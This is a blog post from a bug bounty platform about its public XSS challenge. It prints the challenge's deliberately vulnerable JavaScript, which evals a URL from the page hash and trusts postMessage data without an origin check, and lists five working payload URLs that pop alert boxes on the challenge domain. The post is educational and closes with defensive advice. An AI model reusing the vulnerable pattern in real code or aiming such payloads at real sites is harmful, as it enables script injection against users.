Bug Bounty & Agile Pentesting Platform

The XSS challenge that +100k people saw but only 90 solved

A couple of days ago we released a XSS challenge. A few hours after sending out the tweet, we noticed the success of this. Therefore, we decided to share a blogpost with the lovely community.

For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case it’s not available anymore or you want to host the challenge yourself, you can find the code below.

  
  const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|/gi, "forbidden");
  const iframe = document.createElement("iframe"); iframe.src = url; document.body.appendChild(iframe);
  iframe.onload = function(){ window.addEventListener("message", executeCtx, false);}
  function executeCtx(e) {
    if(e.source == iframe.contentWindow){
      e.data.location = window.location;
      Object.assign(window, e.data);
      eval(url);
    }
  }

Solution

We could write an in detail explanation on how to solve this challenge, but we couldn’t do a better job than Dominic and dPhoeniixx. Both researchers shared a well written and very detailed blogpost. You can find the link below.

Solution of Dominic

Solution of DPhoenixx

Wondering how this challenge could be solved via a different way? Take a look at the payloads shared below.

https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==

by n0tm3

https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E

by Karel_Origin

https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11

by terjanq

https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253e

by daudmalik06

https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253E

by _zulln

One of the most common mistakes we saw was people executing the alert box inside the iframe. But that is not valid solution because the javascript doesn’t get triggered on challenge.intigriti.io but in the iframe itself (domain = null).

Overview of the tips

The four tips shared during the challenge:

First tip: “It’s all about that base, ’bout that base”.

Second tip: “Define the undefined”.

Third tip: “You don’t need any external resources.”

Forth tip: “Look for the charset.”

Key takeaways

  • Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger tool built-in your browser.
  • Do not trust user input. Input validation is the key!
  • Seeing a message event? Make sure you check the origin?
  • Avoid the usage of eval().
  • Do not give up. Patience is key.

Thank you!

A special thanks to @filedescriptor and @edoverflow for hardening our challenge!

Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.

Want more?

Follow us on twitter and don’t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.

 

%d bloggers like this: